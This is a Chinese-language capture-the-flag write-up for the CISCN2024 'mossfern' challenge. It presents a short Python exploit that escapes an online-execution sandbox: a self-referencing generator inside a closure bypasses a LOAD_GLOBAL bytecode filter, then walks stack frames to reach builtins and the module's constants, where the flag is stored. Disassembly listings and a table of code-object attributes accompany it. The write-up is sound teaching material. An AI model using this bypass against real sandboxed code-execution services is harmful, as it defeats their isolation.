CISCN2024-mossfern

703 字

4 分钟

CISCN2024-mossfern

2025-12-13

CTF

/

WP

/

WEB

小明最近搭建了一个学习 Python 的网站，他上线了一个 Demo。据说提供了很火很安全的在线执行功能，你能帮他测测看吗？

直接给出exp，还是十分简单的，这个解法可能是个小的非预期的解，因为好多过滤都直接忽视了：

1
def a():
2
  g = (g.gi_frame.f_back.f_back.f_back.f_back for _ in [1])
3
  f = [x for x in g][0]
4
  code = f.f_code
5
  builtins = f.f_globals["_"+"_builtins_"+"_"]
6
  str = builtins.str
7
  print(str(code.co_consts).replace("}", "]"))
8
a()

注意这外层的a()函数的作用是形成闭包，防止在生成器的自引用时加载到全局变量以绕过字节码LOAD_GLOBAL的过滤，具体的原因我不多解释~~因为我也半知半解~~，这里贴出两种情况下生成器的反汇编码，有兴趣的可以看看：

1
[
2
    'Disassembly of <code object <genexpr> at 0x7f6b5ed42c30, file "<dis>", line 3>:',
3
    "  --           COPY_FREE_VARS           1",
4
    "",
5
    "   3           RETURN_GENERATOR",
6
    "               POP_TOP",
7
    "       L1:     RESUME                   0",
8
    "               LOAD_FAST                0 (.0)",
9
    "               GET_ITER",
10
    "       L2:     FOR_ITER                57 (to L3)",
11
    "               STORE_FAST               1 (_)",
12
    "               LOAD_DEREF               2 (g)",
13
    "               LOAD_ATTR                0 (gi_frame)",
14
    "               LOAD_ATTR                2 (f_back)",
15
    "               LOAD_ATTR                2 (f_back)",
16
    "               LOAD_ATTR                2 (f_back)",
17
    "               LOAD_ATTR                2 (f_back)",
18
    "               YIELD_VALUE              0",
19
    "               RESUME                   5",
20
    "               POP_TOP",
21
    "               JUMP_BACKWARD           59 (to L2)",
22
    "       L3:     END_FOR",
23
    "               POP_TOP",
24
    "               RETURN_CONST             0 (None)",
25
    "",
26
    "  --   L4:     CALL_INTRINSIC_1         3 (INTRINSIC_STOPITERATION_ERROR)",
27
    "               RERAISE                  1",
28
    "ExceptionTable:",
29
    "  L1 to L4 -> L4 [0] lasti",
30
    "",
31
]

1
[
2
    'Disassembly of <code object <genexpr> at 0x7ff5d6b42c30, file "<dis>", line 2>:',
3
    "   2           RETURN_GENERATOR",
4
    "               POP_TOP",
5
    "       L1:     RESUME                   0",
6
    "               LOAD_FAST                0 (.0)",
7
    "               GET_ITER",
8
    "       L2:     FOR_ITER                61 (to L3)",
9
    "               STORE_FAST               1 (_)",
10
    "               LOAD_GLOBAL              0 (g)",
11
    "               LOAD_ATTR                2 (gi_frame)",
12
    "               LOAD_ATTR                4 (f_back)",
13
    "               LOAD_ATTR                4 (f_back)",
14
    "               LOAD_ATTR                4 (f_back)",
15
    "               LOAD_ATTR                4 (f_back)",
16
    "               YIELD_VALUE              0",
17
    "               RESUME                   5",
18
    "               POP_TOP",
19
    "               JUMP_BACKWARD           63 (to L2)",
20
    "       L3:     END_FOR",
21
    "               POP_TOP",
22
    "               RETURN_CONST             0 (None)",
23
    "",
24
    "  --   L4:     CALL_INTRINSIC_1         3 (INTRINSIC_STOPITERATION_ERROR)",
25
    "               RERAISE                  1",
26
    "ExceptionTable:",
27
    "  L1 to L4 -> L4 [0] lasti",
28
    "",
29
]

接下来就是通过f_back往下爬调用栈，这里g.gi_frame自引用得到当前生成器的栈帧，然后到<listcomp>列表推导式的栈帧，然后是当前整个函数的栈帧，然后是模块级的当前代码对象的栈帧，也就是exec执行的内容，最后是模块级的整个运行文件的代码对象的栈帧，也就是app/uploads/THIS_IS_TASK_RANDOM_ID.py。

我们使用f_code，来得到当前的代码对象本身，之后就是得到常量里的flag。

最后附上一张常用code对象属性的表，忘记了也可以通过dir()函数去查。

常用属性	作用
co_argcount	位置参数数量
co_nlocals	局部变量数量
co_stacksize	需要的栈空间
co_flags	标志位
co_code	字节码序列
co_consts	常量元组
co_names	名称元组
co_varnames	变量名元组
co_filename	文件名
co_name	名称
co_firstlineno	第一行行号
co_lnotab	行号表
co_freevars	自由变量名
co_cellvars	单元格变